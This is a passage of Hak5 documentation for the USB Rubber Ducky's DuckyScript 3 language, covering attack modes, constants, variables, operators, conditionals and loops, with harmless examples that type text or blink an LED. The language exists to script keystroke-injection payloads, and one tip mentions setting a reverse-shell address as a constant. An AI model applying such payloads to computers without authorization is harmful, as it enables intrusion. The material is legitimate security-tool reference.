### $\_CURRENT\_PID [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#_current_pid)
Returns the currently operating Product ID with endian swapped.
May only be retrieved. Cannot be set.
### $\_CURRENT\_ATTACKMODE [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#_current_attackmode)
Returns the currently operating ATTACKMODE represented as:
| Value | ATTACKMODE |
| --- | --- |
| 0 | `OFF` |
| 1 | `HID` |
| 2 | `STORAGE` |
| 3 | `COMPOSITE` (Both `HID` and `STORAGE`) |
May only be retrieved. Cannot be set.
* * *
[_navigate\_before_ The LED](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-led/)
[Constants _navigate\_next_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/constants/)
---
# Constants | Hak5 - USB Rubber Ducky
[](https://docs.hak5.org/hak5-usb-rubber-ducky/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Overview
_article_
Constants
=========
Overview [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/constants/#overview)
------------------------------------------------------------------------------------------------------------------------
A constant is like a variable, except that its value **cannot change** throughout the runtime of the program.
DEFINE [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/constants/#define)
--------------------------------------------------------------------------------------------------------------------
In DuckyScript, a constant is initialized using the `DEFINE` command. One may consider the use of a `DEFINE` within a payload **like a find-and-replace** just before the time of compile - within what is called the preprocessor.
`DEFINE` can be used to more easily expose or abstract configuration options used throughout your payload. This means to change a constant value that is described by a `DEFINE` you only need to change it in one location no matter how many times its used throughout your payload.
### Syntax [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/constants/#syntax)
DEFINE LABEL VALUE
1. `DEFINE` denotes the start of a constant definition
2. `LABEL` is the label or key to be used by the compiler to locate usage within your payload
3. `VALUE` is the value to replace matching instances of `LABEL` throughout your payload. The `VALUE` is everything past `LABEL` to the end of the line (minus the first space).
With this in mind its best to keep your `LABEL` as descriptive as possible. Remember - **it will be replaced with the given** `VALUE` - the length of the `LABEL` will have no affect on the actual length of your compiled payload.\\
### Within PayloadStudio [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/constants/#within-payloadstudio)
PayloadStudio takes the guess work out of what will get replaced where by automatically annotating lines that are modified by `DEFINE` statements throughout your payload.

PayloadStudio Annotation
This also gives you the chance to spot any misconfigurations when compiling your payload as PayloadStudio will list these in the console upon generating your `inject.bin`

PayloadStudio on Compile
Labels [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/constants/#labels)
--------------------------------------------------------------------------------------------------------------------
Depending on the format of your `LABEL`, `DEFINE` will behave differently in it’s find-and-replace method. This is to significantly reduce the likelihood that your `DEFINE` statement has negative unintended side-affects.
### With `#` [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/constants/#with-)
check\_circle
`DEFINE #LABEL` will replace **any** instance of `#LABEL` (except another DEFINE)
`DEFINE #myConstant TEST`
Using this syntax, `#myURLConstant` will be replaced anywhere within your payload **even if it is touching other characters.** This is because the `LABEL` starts with `#`
DEFINE #myURLConstant example.com
STRING https://www.#myURLConstant
This will result in `https://www.example.com` because `#myURLConstant` starts with a `#`

PayloadStudio annotation
### Without `#` [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/constants/#without-)
warning
`DEFINE LABEL` will replace any instance of `LABEL` **as its own word** separated by spaces (except another DEFINE)
`DEFINE myURLConstant TEST`
Using this syntax, `myURLConstant` will be replaced **anywhere it is not touching other characters (is its own individual word)** within your payload. This is because the `LABEL` does not start with `#`
DEFINE myURLConstant example.com
STRING my website name is myURLConstant
this will result in `my website name is example.com`

PayloadStudio annotation
report
[Best practice is to start your label with `#`](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/constants/#with)
While this method is **still supported**, it is no longer best practice.
Usage of a given `LABEL` becomes _very hard_ to spot mid-payload making your payload more ambiguous without the help of PayloadStudio.
Consider the following example:
`DEFINE test 123`
`STRING This is a test showing the ambiguity`
Result:
`This is a 123 showing the ambiguity`
The instance of `test` in the above `STRING` _will be replaced but it is not obvious_ if the `DEFINE` is not directly above it.
Examples [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/constants/#examples)
------------------------------------------------------------------------------------------------------------------------
### Example as Boolean [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/constants/#example-as-boolean)
REM Example Boolean
DEFINE #BLINK_ON_FINISH TRUE
DuckyScript developers may find it useful to include defines at the top of their payload which determine whether or not a function will run. This makes it easier for the end-user to customize a shared payload.
### Example as Integer [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/constants/#example-as-integer)
REM Integer
DEFINE #DELAY_SPEED 2000
In this example, one may imagine the `DELAY_SPEED` constant will be used in conjunction with one or more `DELAY` commands.
### Example as `STRING` [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/constants/#example-as-string)
DEFINE #MESSAGE example.com
STRING https://
STRING #MESSAGE
DEFINE #MESSAGE example.com
STRING https://#MESSAGE
In both cases this will result in “`https://example.com`” being typed because the label used starts with a `#` [See above](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/constants/#with)
### Example Payload [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/constants/#example-payload)
REM Example constants using DEFINE
ATTACKMODE HID STORAGE
DEFINE #SPEED 2000
DEFINE #MESSAGE1 Hello,
DEFINE #MESSAGE2 World! Written with a define!
DELAY #SPEED
STRING #MESSAGE1
DELAY #SPEED
SPACE
STRING #MESSAGE2
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/constants/#result)
* The payload will begin with a 2 second delay, then type “`Hello, World! Written with a define!`” with a 2 second delay in between `#MESSAGE1` and `#MESSAGE2`.
* Changing the string values of `#MESSAGE1` and `#MESSAGE2` will change the outcome of the payload.
* Changing the integer value of `#SPEED` will change the delay between the first and second message.
### Advanced Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/constants/#advanced-example)
Considering `DEFINE` is a effectively an automatic find-and-replace step prior to compile, the `VALUE` of a `DEFINE` is not limited to any specific datatypes. Any valid DuckyScript syntax can be the `VALUE` of a `DEFINE`
DEFINE #FINISHED_PAYLOAD_LED LED_G
...Payload...
#FINISHED_PAYLOAD_LED

PayloadStudio annotation
Best Practices [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/constants/#best-practices)
------------------------------------------------------------------------------------------------------------------------------------
Configurable payload options should be specified in variables or defines at the top of the payload.
Define labels should start with `#` for easy identification throughout your payload.
When writing a payload that calls external resources which may vary depending on the operator, such as a website to open or address to establish a reverse shell with, it is best to use `DEFINE`.
In addition to comment blocks (like the `REM` title/author/description lines in the above example), putting your `DEFINE` commands at the top of your payload makes it easier for someone else to use your payload effectively. Even more so if the constants are commented!
Avoiding Errors [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/constants/#avoiding-errors)
--------------------------------------------------------------------------------------------------------------------------------------
* Internal variables begin with an underscore, so it is best practice to avoid this style.
* Spaces cannot be used in naming a constant — however underscore makes for a suitable replacement. For example: `DEFINE #REMOTE_HOST 192.168.1.100`.
* Labels should descriptive. For example, `#RHST` is better than `#R`, and `#REMOTE_HOST` is better than `#RHOST`.
* Be careful when using the uppercase letter `O` or lowercase letter `l` as they may be confused with the numbers `0` and `1`.
* Avoid using the names of commands or internal variables (e.g. `ATTACKMODE`, `STRING`, `WINDOWS`, `MAC`, `$_BUTTON_ENABLED`). [See the full command and variable reference.](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/)
### Invalid Usages [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/constants/#invalid-usages)
DEFINE myURLConstant example.com
STRING https://www.myURLConstant
This will result in `https://www.myURLConstant` because `myURLConstant` was **not its own word and does not start with `#`**
report
DEFINEs are excluded from being substituted by other DEFINEs
DEFINE #TEST 123
DEFINE #TEST2 #TEST
This **will not** replace the value of `#TEST2` with `123`
* * *
[_navigate\_before_ Attack Modes](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/)
[Variables _navigate\_next_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/variables/)
---
# Variables | Hak5 - USB Rubber Ducky
[](https://docs.hak5.org/hak5-usb-rubber-ducky/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Overview
_article_
Variables
=========
Overview [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/variables/#overview)
------------------------------------------------------------------------------------------------------------------------
A variable is a value which may be changed throughout the program. It may be changed by operators, or compared within conditional statements to alter the program flow.
Variables contain unsigned integers with a values ranging from 0 to 65535. Booleans may be represented by the keywords `TRUE` and `FALSE`, or any non-zero integer for true and `0` for false.
All variables have a **global scope** — meaning it may be referred to anywhere within the payload.
VAR [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/variables/#var)
--------------------------------------------------------------------------------------------------------------
In DuckyScript, variables are initialized using the `VAR` command.
REM Example Integer Variable
VAR $SPEED = 2000
REM Example Boolean (TRUE/FALSE or 1/0)
VAR $BLINK = TRUE
VAR $BLINK = 1
Unlike a constant (declared by `DEFINE`), a variable is prepended with the dollar sign ("`$`") sigil.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/variables/#example)
REM Constant string which may not change throughout the payload
DEFINE FOO Hello, World!
REM Variable integer which may change throughout the payload
VAR $BAR = 1337
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/variables/#result)
* The constant `FOO` will always be replaced with the string “`Hello, World!`” throughout the payload.
* While the variable `$BAR` currently holds the value `1337`, this may change throughout the payload — which will be detailed shortly by using operators.
Internal Variables [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/variables/#internal-variables)
--------------------------------------------------------------------------------------------------------------------------------------------
In addition to creating your own variables using the `VAR` command, DuckyScript 3 provides many built-in internal variables. These variables exist automatically and are prepended with dollar sign underscore ("`$_`"). These internal variables will be described in full in sections ahead relevant to their individual usage. For a complete list you may find them [listed in the quick reference.](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#internal-variables)
Avoiding Errors [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/variables/#avoiding-errors)
--------------------------------------------------------------------------------------------------------------------------------------
* Variable names should only contain letters, numbers and underscore ("`_`").
* Internal variables begin with an underscore, so it is best practice to avoid this style.
* Spaces cannot be used in naming a variable — however underscore makes for a suitable replacement. For example: `VAR $BLINK_ON_FINISH = TRUE`.
* Constants should be short and descriptive. For example, `$BLINK` is better than `$B`, and `$BLINK_ON_FINISH` is better than `$BLINK`.
* Be careful when using the uppercase letter `O` or lowercase letter `l` as they may be confused with the numbers `0` and `1`.
* Avoid using the names of commands or internal variables (e.g. `ATTACKMODE`, `STRING`, `WINDOWS`, `MAC`, `$_BUTTON_ENABLED`). See the full command and variable reference.
* * *
[_navigate\_before_ Constants](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/constants/)
[Operators _navigate\_next_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/operators/)
---
# OPERATORS, CONDITIONS, LOOPS, AND FUNCTIONS | Hak5 - USB Rubber Ducky
[](https://docs.hak5.org/hak5-usb-rubber-ducky/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
OPERATORS, CONDITIONS, LOOPS, AND FUNCTIONS
===========================================
* * *
---
# Operators | Hak5 - USB Rubber Ducky
[](https://docs.hak5.org/hak5-usb-rubber-ducky/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Overview
_article_
Operators
=========
Overview [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/operators/#overview)
----------------------------------------------------------------------------------------------------------------------------
Operators in DuckyScript instruct the payload to perform a given mathematical, relational or logical operation.
Math Operators [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/operators/#math-operators)
----------------------------------------------------------------------------------------------------------------------------------------
Math operators may be used to change the value of a variable.
| Operator | Meaning |
| --- | --- |
| \= | Assignment |
| + | Add |
| \- | Subtract |
| \* | Multiply |
| / | Divide |
| % | Modulus |
| ^ | Exponent |
### Examples [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/operators/#examples)
Consider how the variable `$FOO` changes with each math operation.
REM Assign $FOO to 42
VAR $FOO = 42
REM The variable is now 42.
REM Let's add it by 1.
$FOO = ( $FOO + 1 )
REM The variable is now 43: the sum of 42 and 1.
REM Let's subtract it by 1.
$FOO = ( $FOO - 1 )
REM The variable is now 42 (again): the difference of 42 and 1.
REM Let's multiply it by 2.
$FOO = ( $FOO * 2 )
REM The variable is now 84: the product of 42 and 2.
REM Let's divide it by 2.
$FOO = ( $FOO / 2 )
REM The variable is now 42 (again): the quotient of 82 and 2.
REM Let's modulus it by 4.
$FOO = ( $FOO % 4 )
REM The variable is now 2: the signed remainder of 42 and 4.
REM Let's raise it to the power of 6.
$FOO = ( $FOO ^ 6 )
REM Our variable is now 64: the exponent of 2 and 6.
Comparison Operators [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/operators/#comparison-operators)
----------------------------------------------------------------------------------------------------------------------------------------------------
Comparison operators (or relational operators) will compare two values to evaluate a single boolean value.
| Operator | Meaning |
| --- | --- |
| \== | Equal to |
| != | Not equal to |
| \> | Greater than |
| < | Less than |
| \>= | Greater than or equal to |
| <= | Less than or equal to |
### Examples [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/operators/#examples-1)
Consider how the different comparison operators evaluate down to a single boolean value for the following variables:
VAR $FOO = 42
VAR $BAR = 1337
* The comparison `( $FOO == $BAR )` evaluates to the boolean `FALSE`.
* The comparison `( $FOO != $BAR )` evaluates to the boolean `TRUE`.
* The comparison `( $FOO > $BAR )` evaluates to the boolean `FALSE`.
* The comparison `( $FOO < $BAR )` evaluates to the boolean `TRUE`.
* The comparison `( $FOO >= $BAR )` evaluates to the boolean `FALSE`.
* The comparison `( $FOO <= $BAR )` evaluates to the boolean `TRUE`.
Order of Operations [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/operators/#order-of-operations)
--------------------------------------------------------------------------------------------------------------------------------------------------
The order of operations (order precedence) are a set of rules that define which procedures are performed first in order to evaluate an expression, similar to that of mathematics.
In DuckyScript, parentheses ( ) are required to define the precedence conventions.
VAR $FOO = ( 4 * 10 ) + 2
REM The expression ( 4 * 10 ) evalues to 40.
REM The expression 40 + 2 evalues to 42.
If multiple pairs of parentheses are required, the parentheses can be nested.
VAR $FOO = 42
VAR $BAR = (( 100 * 13 ) + ( $FOO - 5 ))
REM The expression 42 - 5 evalues to 37
REM The expression ( 100 * 13 ) evalues to 1300
REM The expression 1300 + 37 evalues to 1337
Logical Operators [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/operators/#logical-operators)
----------------------------------------------------------------------------------------------------------------------------------------------
Logical operators are important as they allow us to make decisions based on certain conditions. For example, when combining the result of more than one condition, the logical AND or OR logical operators will make the final determination.
These logical operators may be used to connect two or more expressions.
| Operator | Description |
| --- | --- |
| && | Logical AND. If both the operands are non-zero, the condition is `TRUE`. |
| \| | Logical OR. If any of the two operands is non-zero, the condition is `TRUE`. |
### Examples [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/operators/#examples-2)
Considering the values of the two variables:
VAR $FOO = 42
VAR $BAR = 1337
The expression `( $FOO < $BAR )` evaluates to `TRUE`.
The expression `( $FOO > $BAR )` evaluates to `FALSE`.
Combining these expressions, we can evaluate:
* `( $FOO < $BAR ) && ( $BAR > $FOO )`
* Evalues down to `TRUE && TRUE`
* Because 42 is less than 1337 is TRUE **AND** 1337 is greater than 42 is TRUE.
* Both operands are non-zero (`TRUE`), therefore the final condition is `TRUE`.
* `( $FOO < $BAR ) || ( $BAR == $FOO )`
* Evaluates as `TRUE || FALSE`
* Because 42 is less than 1337 is TRUE **OR** 1337 is equal to 42 is FALSE.
* Any of the operands are non-zero (`TRUE`), therefore the final condition is `TRUE`.
Augmented Assignment Operators [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/operators/#augmented-assignment-operators)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
When assigning a value to a variable, the variable itself may be referenced.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/operators/#example)
VAR $FOO = 1337
VAR $FOO = ( $FOO + 1 )
REM $FOO will now equal 1338
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/operators/#result)
* The variable `$FOO` is initiated as `1337`.
* `$FOO` is incremented by `1` (itself plus 1).
* `$FOO` will then equal `1338`.
Bitwise Operators [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/operators/#bitwise-operators)
----------------------------------------------------------------------------------------------------------------------------------------------
Bitwise operators are operators which operate on the uint16 values at the binary level.
| Operator | Description |
| --- | --- |
| & | Bitwise AND. If the corresponding bits of the two operands is 1, will result in 1. Otherwise if either bit of an operand is 0, the result of the corresponding bit is evaluated as 0. |
| \| | Bitwise OR. If at least one corresponding bit of the two operands is 1, will result in 1. |
| \>> | Right Shift. Accepts two numbers. Right shifts the bits of the first operand. The second operand determines the number of places to shift. |
| << | Left Shift. Accepts two numbers. Left shifts the bits of the first operand. The second operand decides the number of places to shift. |
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/operators/#example-1)
ATTACKMODE HID STORAGE VID_05AC PID_021E
VAR $FOO = $_CURRENT_VID
REM Because VID and PID parameters are little endian,
$FOO = ((($FOO >> 8) & 0x00FF) | (($FOO << 8) & 0xFF00))
REM $FOO will now equal 0xAC05
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/operators/#result-1)
* The value of `$_CURRENT_VID` is saved into the variable `$FOO` as `AC05`.
* Using bitwise operators its endianness is swapped to `05AC`.
* * *
[_navigate\_before_ Variables](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/variables/)
[Conditional Statements _navigate\_next_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/conditional-statements/)
---
# ATTACK MODES, CONSTANTS, AND VARIABLES | Hak5 - USB Rubber Ducky
[](https://docs.hak5.org/hak5-usb-rubber-ducky/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
ATTACK MODES, CONSTANTS, AND VARIABLES
======================================
* * *
---
# Conditional Statements | Hak5 - USB Rubber Ducky
[](https://docs.hak5.org/hak5-usb-rubber-ducky/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Overview
_article_
Conditional Statements
======================
Overview [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/conditional-statements/#overview)
-----------------------------------------------------------------------------------------------------------------------------------------
Previously, original DuckyScript payloads executed sequentially — line by line from start to finish.
With DuckyScript 3.0, it isn’t necessary for payload execution to be linear. Conditional statements, loops and functions allow for dynamic execution.
`IF` [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/conditional-statements/#if)
-------------------------------------------------------------------------------------------------------------------------------
The flow control statement `IF` will determine whether or not to execute its block of code based on the evaluation of an expression. One way to interpret an `IF` statement is to read it as “`IF` this condition is true, `THEN` do this”.
### Syntax [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/conditional-statements/#syntax)
The IF statement consists of these parts
* The `IF` keyword
* The condition, or expression that evaluates to `TRUE` or `FALSE`
* In nearly all cases, the expression should be surrounded by parenthesis `( )`
* The `THEN` keyword
* One or more newlines containing the block of code to execute
* The `END_IF` keyword
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/conditional-statements/#example)
REM Example IF THEN
$FOO = 42
$BAR = 1337
IF ( $FOO < $BAR ) THEN
STRING 42 is less than 1337
END_IF
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/conditional-statements/#result)
* The expression “Is 42 less than 1337” is evaluated and determined to be `TRUE`.
* Because the `IF` condition is `TRUE`, the code between the keywords `THEN` and `END_IF` are executed.
* The string “`42 is less than 1337`” is typed.
`ELSE` [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/conditional-statements/#else)
-----------------------------------------------------------------------------------------------------------------------------------
The ELSE statement is an optional component of the IF statement which will only execute when the IF statement condition is FALSE. One way to interpret an `ELSE` statement is to read it as “`IF` this condition is true, `THEN` do this thing, or `ELSE` do another thing”.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/conditional-statements/#example-1)
REM Example IF THEN ELSE
IF ( $_CAPSLOCK_ON == TRUE ) THEN
STRING Capslock is on!
ELSE IF ( $_CAPSLOCK_ON == FALSE ) THEN
STRING Capslock is off!
END_IF
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/conditional-statements/#result-1)
* The condition of the capslock key, as determined by the target operating system, is checked.
* If the capslock key state has been reported by the target as ON, the string “`Capslock is on`” will be typed.
* Otherwise, if the capslock key state has not been reported by the target (or it has been reported as not being on), the string “`Capslock is off`” will be typed.
Nested `IF` Statements [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/conditional-statements/#nested-if-statements)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
A nested IF statement is quite simply an IF statement placed inside another IF statement. Nested IF statements may be used when evaluating a combination of conditions.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/conditional-statements/#example-2)
REM Example nested IF statements
IF ( $_CAPSLOCK_ON == TRUE ) THEN
IF ( $_NUMLOCK_ON == TRUE ) THEN
STRING Both Capslock and Numlock are on!
END_IF
END_IF
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/conditional-statements/#result-2)
* The condition of the first `IF` statement is evaluated — whether or not the target has reported that the Capslock key is on. If it is `TRUE`, then the nested `IF` statement will run.
* The second `IF` statement is evaluated much like the first, only this time checking the status of the Numlock key.
* If both the capslock and numlock keys have been reported by the target as being on, then the string “`Both Capslock and Numlock are on!`” will be typed.
`IF` Statements with logical operators [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/conditional-statements/#if-statements-with-logical-operators)
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
In some cases it may be more efficient to use logical operators within a single IF statement, rather than using a nested IF structure.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/conditional-statements/#example-3)
REM Example IF statement with logical operators
IF (( $_CAPSLOCK_ON == TRUE ) && ( $_NUMLOCK_ON == TRUE )) THEN
STRING Both Capslock and Numlock are on!
END_IF
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/conditional-statements/#result-3)
* Because the AND logical operator is in use, the whole condition will only evaluate as TRUE if both sub conditions are TRUE.
* Similar to the Nested IF example, the string “`Both Capslock and Numlock are on!`” will only be typed if both capslock and numlock are reported by the target as being on.
`IF` Statement Optimization [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/conditional-statements/#if-statement-optimization)
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
The syntax of `IF` states that in nearly all cases the expression should be surrounded by parenthesis `( )` — however there is an exception to this rule.
If the condition of only one variable is _true_ or _false_, the parenthesis may be omitted. This results in a slightly smaller encoded `inject.bin` file as well as slightly faster payload execution. This is because it removes the step of first reducing the order precedence.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/conditional-statements/#example-4)
REM Example of optimized and unoptimized IF statements
REM Consider
VAR $FLAG = TRUE
IF $FLAG THEN
STRING FLAG is TRUE
END_IF
REM versus
IF ( $FLAG == TRUE ) THEN
STRING FLAG is TRUE
END_IF
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/conditional-statements/#result-4)
* In the first example, the `IF` statement without the parenthesis results in a 6 bytes added to the compiled `inject.bin` file.
* In the second example, the `IF` statement surrounded by parenthesis results in 16 bytes added to the compiled `inject.bin` file.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/conditional-statements/#example-5)
REM Example of optimized IF statement with internal variable
IF $_CAPSLOCK_ON THEN
STRINGLN The caps lock key is on
END_IF
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/conditional-statements/#result-5)
* The internal variable `$_CAPSLOCK_ON` is checked.
* If it evaluates as `TRUE`, the message “`The caps lock key is on`” is typed.
* * *
[_navigate\_before_ Operators](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/operators/)
[Loops _navigate\_next_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/loops/)
---
# Loops | Hak5 - USB Rubber Ducky
[](https://docs.hak5.org/hak5-usb-rubber-ducky/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Overview
_article_
Loops
=====
Overview [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/loops/#overview)
------------------------------------------------------------------------------------------------------------------------
Loops are flow control statements that can be used to repeat instructions until a specific condition is reached.
WHILE [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/loops/#while)
------------------------------------------------------------------------------------------------------------------
A block of code can be executed repeatedly a specified number of times (called iterations) using a `WHILE` statement. The code within the `WHILE` statement will continue to execute for as long as the condition of the `WHILE` statement is `TRUE`.
A `WHILE` statement is similar to an `IF` statement, however it behaves differently when at the statements end. Whereas at the end of an `IF` statement the payload will continue, when the end of a `WHILE` statement is reached the payload execution will jump back to the beginning of the WHILE statement and reevaluate the condition. One way to interpret a `WHILE` statement is to read it as “IF this condition is true, THEN do that until it isn’t true anymore” — hence it being called a while loop.
### Syntax [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/loops/#syntax)
The `WHILE` statement consists of four parts
1. The `WHILE` keyword.
2. The condition, or expression that evaluates to `TRUE` or `FALSE`.
3. One or more newlines containing the block of code to execute.
4. The `END_WHILE` keyword.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/loops/#example)
REM Example while loop - blink LED 42 times
VAR $FOO = 42
WHILE ( $FOO > 0 )
LED_G
DELAY 500
LED_OFF
DELAY 500
$FOO = ( $FOO - 1 )
END_WHILE
LED_R
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/loops/#result)
* The variable `$FOO` is set to 42.
* The `WHILE` loop begins, evaluating the condition “is $FOO greater than 0”.
* Every time the condition is `TRUE`, the block of code between `WHILE` and `END_WHILE` will run.
* The LED will blink green: half a second on, half a second off.
* The variable `$FOO` will decrement by one.
* Once `$FOO` reaches zero, the `WHILE` condition will no longer evaluate to `TRUE`. The payload will continue execution after the `END_WHILE` statement, where the LED will light red.
* If the button is pressed at any time during the payload execution, the `WHILE` loop will end and the USB Rubber Ducky will enter `ATTACKMODE STORAGE` since that is the default behavior when no `BUTTON_DEF` has been initiated.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/loops/#example-1)
REM Example while loop - press the button 5 times
VAR $FOO = 5
WHILE ( $FOO > 0 )
STRINGLN Press the button...
WAIT_FOR_BUTTON_PRESS
$FOO = ( $FOO - 1 )
END_WHILE
STRINGLN You pressed the button 5 times!
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/loops/#result-1)
* The variable `$FOO` is set to 5.
* The code block within the `WHILE` loop will be repeated until the expression evaluates to `FALSE`.
* For each run of the code block, the message “`Press the button...`” is typed. The payload then waits until it detects the button is pressed, at which point the variable `$FOO` is decremented.
Infinite Loop [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/loops/#infinite-loop)
----------------------------------------------------------------------------------------------------------------------------------
The syntax of `WHILE` states that in nearly all cases the expression should be surrounded by parenthesis `( )`. The exception is when initiating an infinite loop. The condition of the expression `TRUE` will always evaluate to `TRUE`. While it is not necessary to omit the parenthesis, it is technically more efficient. This is because it directly references `TRUE`, reducing the number of instructions and removing the step of first reducing the order of precedence.
